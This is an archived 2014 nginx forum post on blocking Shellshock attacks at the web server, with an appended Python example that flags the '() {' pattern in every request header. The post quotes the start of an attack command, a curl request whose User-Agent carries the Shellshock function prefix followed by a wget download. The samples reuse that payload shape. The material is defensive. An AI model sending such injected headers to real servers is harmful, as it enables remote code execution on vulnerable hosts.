Shellshock protection using nginx ?

mex nginx-forum at
Fri Sep 26 09:23:04 UTC 2014

curl -k -H 'User-Agent: () { somedummytext; }; /usr/bin/wget -O


if, you should try to match for (regex-pattern) "\(\) {" 
#since this must be written like this;
an additional space between "()      {" would render the exploit

furthermore: you are missing all headers; attacks I've seen so far worked
- UA
- cookies
- custom headers

customized attacks might work via POST-BODY too, but this is yet not

Posted at Nginx Forum:,253553,253557#msg-253557
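
The check described in this post (match the pattern `\(\) {` in every request header, not only the User-Agent), as an added example that is not part of the original post. The function names and the sample requests are constructed for illustration.

```python
import re

# Pattern from the post: the literal characters "() {" with exactly one space.
SHELLSHOCK_RE = re.compile(r"\(\) \{")


def ua_only_block(headers):
    """Weak check: inspects the User-Agent header only."""
    return any(
        name.lower() == "user-agent" and SHELLSHOCK_RE.search(value)
        for name, value in headers
    )


def suspicious_headers(headers):
    """Return the sorted, lower-cased names of all headers carrying the pattern.

    `headers` is a list of (name, value) pairs so that repeated headers
    (for example several Cookie lines) are each inspected.
    """
    return sorted({n.lower() for n, v in headers if SHELLSHOCK_RE.search(v)})


def should_block(headers):
    """Stronger check: reject the request if any header matches."""
    return bool(suspicious_headers(headers))


# Constructed sample requests (not captured traffic); "<command>" is a placeholder.
PAYLOAD = "() { somedummytext; }; <command>"
SAMPLES = {
    "ua": [("Host", "example.test"), ("User-Agent", PAYLOAD)],
    "cookie": [("User-Agent", "Mozilla/5.0"), ("Cookie", "sid=1; x=" + PAYLOAD)],
    "custom": [("User-Agent", "curl/7.38.0"), ("X-Anything", PAYLOAD)],
    # Two spaces between "()" and "{": not matched by the post's pattern.
    "extra_space": [("User-Agent", "()  { somedummytext; }")],
    "clean": [("User-Agent", "Mozilla/5.0 (X11; Linux x86_64)"), ("Cookie", "sid=abc")],
}

if __name__ == "__main__":
    for label, hdrs in SAMPLES.items():
        print(f"{label:12} ua_only={ua_only_block(hdrs)!s:5} "
              f"all_headers={should_block(hdrs)!s:5} hits={suspicious_headers(hdrs)}")
```

Running it prints one line per sample, showing which requests the User-Agent-only check lets through and which headers the all-headers check flags.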
